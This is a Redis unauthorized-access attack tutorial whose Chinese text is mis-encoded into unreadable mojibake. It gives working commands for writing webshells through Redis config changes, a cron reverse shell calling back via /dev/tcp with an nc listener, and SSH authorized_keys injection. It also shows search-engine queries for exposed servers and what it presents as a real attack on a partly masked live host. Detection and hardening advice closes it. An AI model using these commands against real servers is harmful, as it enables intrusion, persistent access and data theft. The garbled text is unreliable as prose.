RedisÔÚ´ó¹«Ë¾±»´óÁ¿Ó¦Óã¬Í¨¹ý±ÊÕßµÄÑо¿·¢ÏÖ£¬Ä¿Ç°ÔÚ»¥ÁªÍøÉÏÒѾ³öÏÖRedisδ¾ÊÚȨ²¡¶¾ËÆ×Ô¶¯¹¥»÷£¬¹¥»÷³É¹¦ºó»á¶ÔÄÚÍø½øÐÐɨÃè¡¢¿ØÖÆ¡¢¸ÐȾÒÔ¼°ÓÃÀ´½øÐÐÍÚ¿ó¡¢ÀÕË÷µÈ¶ñÒâÐÐΪ£¬ÔçÆÚÍøÉÏÔø¾·ÖÎö¹ýһƪÎÄÕ¡°Í¨¹ýredis¸ÐȾlinux°æ±¾ÀÕË÷²¡¶¾µÄ·þÎñÆ÷¡±£¨http://www.sohu.com/a/143409075_765820£©£¬Èç¹û¹«Ë¾Ê¹ÓÃÁËRedis£¬ÄÇôӦµ±¸øÓèÖØÊÓ£¬Í¨¹ýʵ¼ÊÑо¿£¬µ±ÔÚÒ»¶¨Ìõ¼þÏ£¬¹¥»÷Õß¿ÉÒÔ»ñÈ¡webshell£¬ÉõÖÁrootȨÏÞ¡£
1.1.1 Redis¼ò½é¼°´î½¨ÊµÑé»·¾³
REmote DIctionary Server(Redis) ÊÇÒ»¸öÓÉSalvatore SanfilippoдµÄkey-value´æ´¢ÏµÍ³¡£
RedisÊÇÒ»¸ö¿ªÔ´µÄʹÓÃANSI CÓïÑÔ±àд¡¢×ñÊØBSDÐÒé¡¢Ö§³ÖÍøÂç¡¢¿É»ùÓÚÄÚ´æÒà¿É³Ö¾Ã»¯µÄÈÕÖ¾ÐÍ¡¢Key-ValueÊý¾Ý¿â£¬²¢Ìṩ¶àÖÖÓïÑÔµÄAPI¡£Ëüͨ³£±»³ÆΪÊý¾Ý½á¹¹·þÎñÆ÷£¬ÒòΪֵ£¨value£©¿ÉÒÔÊÇ×Ö·û´®(String), ¹þÏ£(Map), Áбí(list), ¼¯ºÏ(sets) ºÍÓÐÐò¼¯ºÏ(sorted sets)µÈÀàÐÍ¡£´Ó2010Äê3ÔÂ15ÈÕÆð£¬RedisµÄ¿ª·¢¹¤×÷ÓÉVMwareÖ÷³Ö¡£´Ó2013Äê5Ô¿ªÊ¼£¬RedisµÄ¿ª·¢ÓÉPivotalÔÞÖú¡£Ä¿Ç°×îÐÂÎȶ¨°æ±¾Îª4.0.8¡£
1.RedisĬÈ϶˿Ú
RedisĬÈÏÅäÖö˿ÚΪ6379£¬sentinel.confÅäÖÃÆ÷¶Ë¿ÚΪ26379
2.¹Ù·½Õ¾µã
https://redis.io/
http://download.redis.io/releases/redis-3.2.11.tar.gz
3.°²×°redis
wget http://download.redis.io/releases/redis-4.0.8.tar.gztar ¨Cxvf redis-4.0.8.tar.gzcd redis-4.0.8make
×îа汾ǰÆÚ©¶´ÒѾÐÞ¸´£¬²âÊÔʱ½¨Òé°²×°3.2.11°æ±¾¡£
4.ÐÞ¸ÄÅäÖÃÎļþredis.conf
£¨1£©cp redis.conf ./src/redis.conf£¨2£©bind 127.0.0.1Ç°Ãæ¼ÓÉÏ#ºÅ×¢Ê͵ô£¨3£©protected-modeÉèΪno£¨4£©Æô¶¯redis-server./src/redis-server redis.conf
×îа氲װ³É¹¦ºó£¬Èçͼ1Ëùʾ¡£Ä¬ÈϵÄÅäÖÃÊÇʹÓÃ6379¶Ë¿Ú£¬Ã»ÓÐÃÜÂë¡£Õâʱºò»áµ¼ÖÂδÊÚȨ·ÃÎÊÈ»ºóʹÓÃredisȨÏÞдÎļþ¡£
ͼ1 °²×°ÅäÖÃredis
5.Á¬½ÓRedis·þÎñÆ÷
£¨1£©½»»¥Ê½·½Ê½
redis-cli -h -p
·½Ê½Á¬½Ó£¬È»ºóËùÓеIJÙ×÷¶¼ÊÇÔÚ½»»¥µÄ·½Ê½ÊµÏÖ£¬²»ÐèÒªÔÙÖ´ÐÐredis-cliÁË£¬ÀýÈçÃüÁredis-cli -h 127.0.0.1-p 6379£¬¼Ó-a²ÎÊý±íʾ´øÃÜÂëµÄ·ÃÎÊ¡£
£¨2£©ÃüÁʽ
redis-cli -h -p
Ö±½ÓµÃµ½ÃüÁîµÄ·µ»Ø½á¹û.
6.³£¼ûÃüÁî
£¨1£©²é¿´ÐÅÏ¢£ºinfo£¨2£©É¾³ýËùÓÐÊý¾Ý¿âÄÚÈÝ£ºflushall£¨3£©Ë¢ÐÂÊý¾Ý¿â£ºflushdb£¨4£©¿´ËùÓмü£ºKEYS *£¬Ê¹ÓÃselect num¿ÉÒԲ鿴¼üÖµÊý¾Ý¡££¨5£©ÉèÖñäÁ¿£ºset test ¡°who am i¡±£¨6£©config set dir dirpath ÉèÖ÷¾¶µÈÅäÖã¨7£©config get dir/dbfilename »ñȡ·¾¶¼°Êý¾ÝÅäÖÃÐÅÏ¢£¨8£©save±£´æ£¨9£©get ±äÁ¿£¬²é¿´±äÁ¿Ãû³Æ
¸ü¶àÃüÁî¿ÉÒԲο¼ÎÄÕ£ºhttps://www.cnblogs.com/kongzhongqijing/p/6867960.html
7.Ïà¹Ø©¶´
ÒòÅäÖò»µ±¿ÉÒÔδ¾ÊÚȨ·ÃÎÊ£¬¹¥»÷ÕßÎÞÐèÈÏÖ¤¾Í¿ÉÒÔ·ÃÎʵ½ÄÚ²¿Êý¾Ý£¬Æ䩶´¿Éµ¼ÖÂÃô¸ÐÐÅϢй¶£¨Redis·þÎñÆ÷´æ´¢Ò»Ð©ÓÐȤµÄsession¡¢cookie»òÉÌÒµÊý¾Ý¿ÉÒÔͨ¹ýgetö¾Ù¼üÖµ£©£¬Ò²¿ÉÒÔ¶ñÒâÖ´ÐÐflushallÀ´Çå¿ÕËùÓÐÊý¾Ý£¬¹¥»÷Õß»¹¿Éͨ¹ýEVALÖ´ÐÐlua´úÂ룬»òͨ¹ýÊý¾Ý±¸·Ý¹¦ÄÜÍù´ÅÅÌдÈëºóÃÅÎļþ¡£Èç¹ûRedisÒÔrootÉí·ÝÔËÐУ¬¿ÉÒÔ¸ørootÕË»§Ð´ÈëSSH¹«Ô¿Îļþ£¬Ö±½ÓÃâÃÜÂëµÇ¼·þÎñÆ÷£¬ÆäÏà¹Ø©¶´ÐÅÏ¢ÈçÏ£º
£¨1£©Redis Ô¶³Ì´úÂëÖ´ÐЩ¶´(CVE-2016-8339)
Redis 3.2.x
£¨2£©CVE-2015-8080
Redis 2.8.xÔÚ2.8.24ÒÔÇ°ºÍ3.0.x ÔÚ3.0.6ÒÔÇ°°æ±¾£¬lua_struct.cÖдæÔÚgetnumº¯ÊýÕûÊýÒç³ö£¬ÔÊÐíÉÏÏÂÎÄÏà¹ØµÄ¹¥»÷ÕßÐí¿ÉÔËÐÐLua´úÂ루ÄÚ´æË𻵺ÍÓ¦ÓóÌÐò±ÀÀ££©»ò¿ÉÄÜÈƹýɳºÐÏÞÖÆÒâͼͨ¹ý´óÁ¿£¬´¥·¢»ùÓÚÕ»µÄ»º³åÇøÒç³ö¡£
£¨3£©CVE-2015-4335
Redis 2.8.1֮ǰ°æ±¾ºÍ3.0.2֮ǰ3.x°æ±¾ÖдæÔÚ°²È«Â©¶´¡£Ô¶³Ì¹¥»÷Õß¿ÉÖ´ÐÐevalÃüÁîÀûÓø鶴ִÐÐÈÎÒâLua×Ö½ÚÂë
£¨4£©CVE-2013-7458
¶ÁÈ¡¡°.rediscli_history¡±ÅäÖÃÎļþÐÅÏ¢¡£
1.1.2 Redis¹¥»÷˼·
1. ÄÚÍø¶Ë¿ÚɨÃè
nmap -v -n -Pn -p 6379 -sV --scriptredis-info 192.168.56.1/24
2.ͨ¹ýÎļþ°üº¬¶ÁÈ¡ÆäÅäÖÃÎļþ
RedisÅäÖÃÎļþÖÐÒ»°ã»áÉèÖÃÃ÷ÎÄÃÜÂ룬ÔÚ½øÐÐÉø͸ʱҲ¿ÉÒÔͨ¹ýwebshell²é¿´ÆäÅäÖÃÎļþ£¬RedisÍùÍù²»Ö»Ò»Ì¨¼ÆËã»ú£¬¿ÉÒÔÀûÓÃÆäÀ´½øÐÐÄÚÍøÉø͸£¬»òÕßÀ©Õ¹È¨ÏÞÉø͸¡£
3.ʹÓÃRedis±©Á¦Æƽ⹤¾ß
https://github.com/evilpacket/redis-sha-crack£¬ÆäÃüÁîΪ£º
node ./redis-sha-crack.js -w wordlist.txt -s shalist.txt 127.0.0.1 host2.example.com:5555
ÐèÒª°²×°node£º
git clone https://github.com/nodejs/node.git
chmod -R 755 node
cd node
./configure
make
4.msfÏÂÀûÓÃÄ£¿é
auxiliary/scanner/redis/file_upload normal Redis File Upload
auxiliary/scanner/redis/redis_login normal Redis Login Utility
auxiliary/scanner/redis/redis_server normal Redis Command Execute Scanner
1.1.3Redis©¶´ÀûÓÃ
1. »ñÈ¡webshell
µ±redisȨÏÞ²»¸ßʱ£¬²¢ÇÒ·þÎñÆ÷¿ª×Åweb·þÎñ£¬ÔÚredisÓÐwebĿ¼дȨÏÞʱ£¬¿ÉÒÔ³¢ÊÔÍùweb·¾¶Ð´webshell£¬Ç°ÌáÊÇÖªµÀÎïÀí·¾¶£¬¾«¼òÃüÁîÈçÏ£º
config set dir E:/www/font
config set dbfilename redis2.aspx
set a ""
save
2.·´µ¯shell
£¨1£©Á¬½ÓRedis·þÎñÆ÷
redis-cli ¨Ch
192.168.106.135 ¨Cp 6379
£¨2£©ÔÚ192.168.106.133ÉÏÖ´ÐÐ
nc ¨Cvlp 7999
(3)Ö´ÐÐÒÔÏÂÃüÁî
set x "\n\n* * * * * bash -i >& /dev/tcp/192.168.106.133/7999 0>&1\n\n"
config set dir /var/spool/cron/
ubantuÎļþΪ£º/var/spool/cron/crontabs/
config set dir /var/spool/cron/crontabs/
config set dbfilename root
save
3.ÃâÃÜÂëµÇ¼ssh
ssh-keygen -t rsa
config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZA3SEwRcvoYWXRkXoxu7BlmhVQz7Dd8H9ZFV0Y0wKOok1moUzW3+rrWHRaSUqLD5+auAmVlG5n1dAyP7ZepMkZHKWU94TubLBDKF7AIS3ZdHHOkYI8y0NRp6jvtOroZ9UO5va6Px4wHTNK+rmoXWxsz1dNDjO8eFy88Qqe9j3meYU/CQHGRSw0/XlzUxA95/ICmDBgQ7E9J/tN8BWWjs5+sS3wkPFXw1liRqpOyChEoYXREfPwxWTxWm68iwkE3/22LbqtpT1RKvVsuaLOrDz1E8qH+TBdjwiPcuzfyLnlWi6fQJci7FAdF2j4r8Mh9ONT5In3nSsAQoacbUS1lul root@kali2018\n\n\n"
save
Ö´ÐÐЧ¹ûÈçͼ2Ëùʾ¡£
ͼ2 Redis©¶´SSHÃâÃÜÂëµÇ¼
4.ʹÓ鶴ËÑË÷ÒýÇæËÑË÷
£¨1£©¶Ô¡°port: 6379¡±½øÐÐËÑË÷
https://www.zoomeye.org/searchResult?q=port:6379
£¨2£©³ýÈ¥ÏÔʾ¡°-NOAUTH Authentication required.¡±µÄ½á¹û£¬ÏÔʾÕâ¸öÐÅÏ¢±íʾÐèÒª½øÐÐÈÏÖ¤£¬Ò²¼´ÐèÒªÃÜÂë²ÅÄÜ·ÃÎÊ¡£
£¨3£©https://fofa.so/
¹Ø¼ü×Ö¼ìË÷£ºport="6379" && protocol==redis && country=CN
1.1.4 RedisÕ˺ŻñÈ¡webshellʵս
1.ɨÃèijĿ±ê·þÎñÆ÷¶Ë¿ÚÐÅÏ¢
ͨ¹ýnmap¶ÔijĿ±ê·þÎñÆ÷½øÐÐÈ«¶Ë¿ÚɨÃ裬·¢ÏÖ¸ÃÄ¿±ê¿ª·ÅRedisµÄ¶Ë¿ÚΪ3357£¬Ä¬È϶˿ÚΪ6379¶Ë¿Ú£¬ÔÙ´Îͨ¹ýiis put scanerÈí¼þ½øÐÐͬÍø¶Î·þÎñÆ÷¸Ã¶Ë¿ÚɨÃ裬Èçͼ3Ëùʾ£¬»ñÈ¡Á½Ì¨¿ª·Å¸Ã¶Ë¿ÚµÄ·þÎñÆ÷¡£
ͼ3 ɨÃèͬÍø¶Î¿ª·Å¸Ã¶Ë¿ÚµÄ·þÎñÆ÷
2.ʹÓÃtelnetµÇ¼·þÎñÆ÷
ʹÓÃÃüÁî¡°telnet ip port¡±ÃüÁîµÇ¼£¬ÀýÈçtelnet 1**.**.**.78 3357£¬µÇ¼ºó£¬ÊäÈëauthºÍÃÜÂë½øÐÐÈÏÖ¤¡£
3.²é¿´²¢±£´æµ±Ç°µÄÅäÖÃÐÅÏ¢
ͨ¹ý¡°config getÃüÁ²é¿´dirºÍdbfilenameµÄÐÅÏ¢£¬²¢¸´ÖÆÏÂÀ´Áô´ýºóÐø»Ö¸´Ê¹Óá£
config get dir
config get dbfilename
4.ÅäÖò¢Ð´Èëwebshell
£¨1£©ÉèÖ÷¾¶
config set dir E:/www/font
£¨2£©ÉèÖÃÊý¾Ý¿âÃû³Æ
½«dbfilename¶ÔÃû³ÆÉèÖÃΪ֧³Ö½Å±¾ÀàÐ͵ÄÎļþ£¬ÀýÈçÍøÕ¾Ö§³Öphp£¬ÔòÉèÖÃfile.php¼´¿É£¬±¾ÀýÖÐΪaspx£¬ËùÒÔÉèÖÃredis.aspx¡£
config set dbfilename redis.aspx
£¨3£©ÉèÖÃwebshellµÄÄÚÈÝ
¸ù¾Ýʵ¼ÊÇé¿öÀ´ÉèÖÃwebshellµÄÄÚÈÝ£¬webshell½ö½öΪһ¸ö±äÁ¿£¬¿ÉÒÔÊÇaµÈÆäËûÈÎÒâ×Ö·û£¬ÏÂÃæΪһЩ²Î¿¼Ê¾Àý¡£
set webshell ""
//php²é¿´ÐÅÏ¢
set webshell " "
//phpwebshell
set webshell ""
// aspxµÄwebshell£¬×¢ÒâË«ÒýºÅʹÓÃ\"
£¨4£©±£´æдÈëµÄÄÚÈÝ
save
£¨5£©²é¿´webshellµÄÄÚÈÝ
get webshell
ÍêÕû¹ý³ÌÖ´ÐÐÃüÁîÈçͼ4Ëùʾ£¬Ã¿Ò»´ÎÃüÁîÏÔʾ¡°+OK¡±±íʾÅäÖóɹ¦¡£
ͼ4 дÈëwebshell
5. ²âÊÔwebshellÊÇ·ñÕý³£
ÔÚä¯ÀÀÆ÷ÖÐÊäÈë¶ÔӦдÈëÎļþµÄÃû×Ö£¬Èçͼ5Ëùʾ½øÐзÃÎÊ£¬³öÏÖÀàËÆ£º
¡°REDIS0006?webshell'a@Hÿ²ó???¡±Ôò±íÃ÷ÕýÈ·»ñÈ¡webshell¡£
ͼ5 ²âÊÔwebshellÊÇ·ñÕý³£
6.»ñÈ¡webshell
Èçͼ6Ëùʾ£¬Ê¹ÓÃÖйú²Ëµ¶ºóÃŹÜÀíÁ¬½Ó¹¤¾ß£¬³É¹¦»ñÈ¡¸ÃÍøÕ¾µÄwebshell¡£
ͼ6 »ñÈ¡webshell
7.»Ö¸´ÔʼÉèÖÃ
£¨1£©»Ö¸´dir
config set dir dirname
£¨2£©»Ö¸´dbfilename
config set dbfilename dbfilename
£¨3£©É¾³ýwebshell
del webshell
£¨4£©Ë¢ÐÂÊý¾Ý¿â
flushdb
8.ÍêÕûÃüÁî×ܽá
telnet 1**.**.**.35 3357
auth 123456
config get dir
config get dbfilename
config set dir E:/www/
config set dbfilename redis2.aspx
set a ""
save
get a
9.²é¿´redisÅäÖÃconfÎļþ
ͨ¹ýwebshell£¬ÔÚÆä¶ÔӦĿ¼Öз¢ÏÖ»¹´æÔÚÆäËüµØÖ·µÄredis£¬Í¨¹ýÏàͬ·½·¨¿ÉÒÔÔٴνøÐÐÉø͸£¬Èçͼ7Ëùʾ£¬¿ÉÒÔ¿´µ½Â·¾¶¡¢¶Ë¿Ú¡¢ÃÜÂëµÈÐÅÏ¢¡£
ͼ7 ²é¿´redisÆäÅäÖÃÎļþ
1.1.5RedisÈëÇÖ¼ì²âºÍ°²È«·À·¶
1.ÈëÇÖ¼ì²â
£¨1£©¼ì²âkey
ͨ¹ý±¾µØµÇ¼£¬Í¨¹ý¡°keys *¡±ÃüÁî²é¿´£¬Èç¹ûÓÐÈëÇÖÔòÆäÖлáÓкܶàµÄÖµ£¬Èçͼ8Ëùʾ£¬ÔÚkeys *Ö´Ðгɹ¦ºó£¬¿ÉÒÔ¿´µ½ÓÐtrojan1ºÍtrojan2ÃüÁִÐÐget trojan1¼´¿É½øÐв鿴¡£
ͼ8 ¼ì²ékeys
£¨2£©linuxÏÂÐèÒª¼ì²éauthorized_keys
RedisÄÚ½¨ÁËÃûΪcrackitµÄkey£¬Ò²¿ÉÒÔÊÇÆäËüÖµ£¬Í¬Ê±RedisµÄconfÎļþÖÐdir²ÎÊýÖ¸ÏòÁË/root/.ssh£¬/root/.ssh/authorized_keys±»¸²¸Ç»òÕß°üº¬RedisÏà¹ØµÄÄÚÈÝ£¬²é¿´ÆäÖµ¾Í¿ÉÒÔÖªµÀÊÇ·ñ±»ÈëÇÖ¹ý¡£
£¨3£©¶ÔÍøÕ¾½øÐÐwebshellɨÃèºÍ·ÖÎö£¬·¢ÏÖÀûÓÃRedisÕ˺Å©¶´µÄ£¬ÔòÔÚshellÖлá´åÔÚRedis×ÖÑù¡£
£¨4£©¶Ô·þÎñÆ÷½øÐкóÃÅÇå²éºÍ´¦Àí¡£
2.ÐÞ¸´°ì·¨
£¨1£©½ûÖ¹¹«Íø¿ª·ÅRedis¶Ë¿Ú,¿ÉÒÔÔÚ·À»ðǽÉϽûÓÃ6379 RedisµÄ¶Ë¿Ú
£¨2£©¼ì²éauthorized_keysÊÇ·ñ·Ç·¨£¬Èç¹ûÒѾ±»Ð޸ģ¬Ôò¿ÉÒÔÖØÐÂÉú³É²¢»Ö¸´£¬²»ÄÜʹÓÃÐ޸ĹýµÄÎļþ¡£²¢ÖØÆôssh·þÎñ£¨service ssh restart£©
£¨3£©Ôö¼Ó Redis ÃÜÂëÑéÖ¤
Ê×ÏÈÍ£Ö¹REDIS·þÎñ£¬´ò¿ªredis.confÅäÖÃÎļþ£¨²»Í¬µÄÅäÖÃÎļþ£¬Æä·¾¶¿ÉÄܲ»Í¬£© /etc/redis/6379.conf£¬ÕÒµ½# # requirepass foobaredÈ¥µôÇ°ÃæµÄ#ºÅ£¬È»ºó½«foobared¸ÄΪ×Ô¼ºÉ趨µÄÃÜÂ룬ÖØÆôÆô¶¯redis·þÎñ¡£
£¨4£©ÐÞ¸ÄconfÎļþ½ûֹȫÍø·ÃÎÊ£¬´ò¿ª6379.confÎļþ£¬ÕÒµ½bind0.0.0.0Ç°Ãæ¼ÓÉÏ# £¨½ûֹȫÍø·ÃÎÊ£©¡£
3.¿É²Î¿¼¼Ó¹ÌÐÞ¸ÄÃüÁî
port ÐÞ¸ÄredisʹÓõÄĬÈ϶˿ںÅbind É趨redis¼àÌýµÄרÓÃIPrequirepass É趨redisÁ¬½ÓµÄÃÜÂërename-command CONFIG ""¡¡ ££½ûÓÃCONFIGÃüÁîrename-command info info2 #ÖØÃüÃûinfoΪinfo2
£¨×÷Õߣºsimeon2005£©
¸É»õ·ÖÏí
ÁìȡרÊô 10ÔªÎÞÃż÷ȯ
˽Ïí×îР¼¼Êõ¸É»õ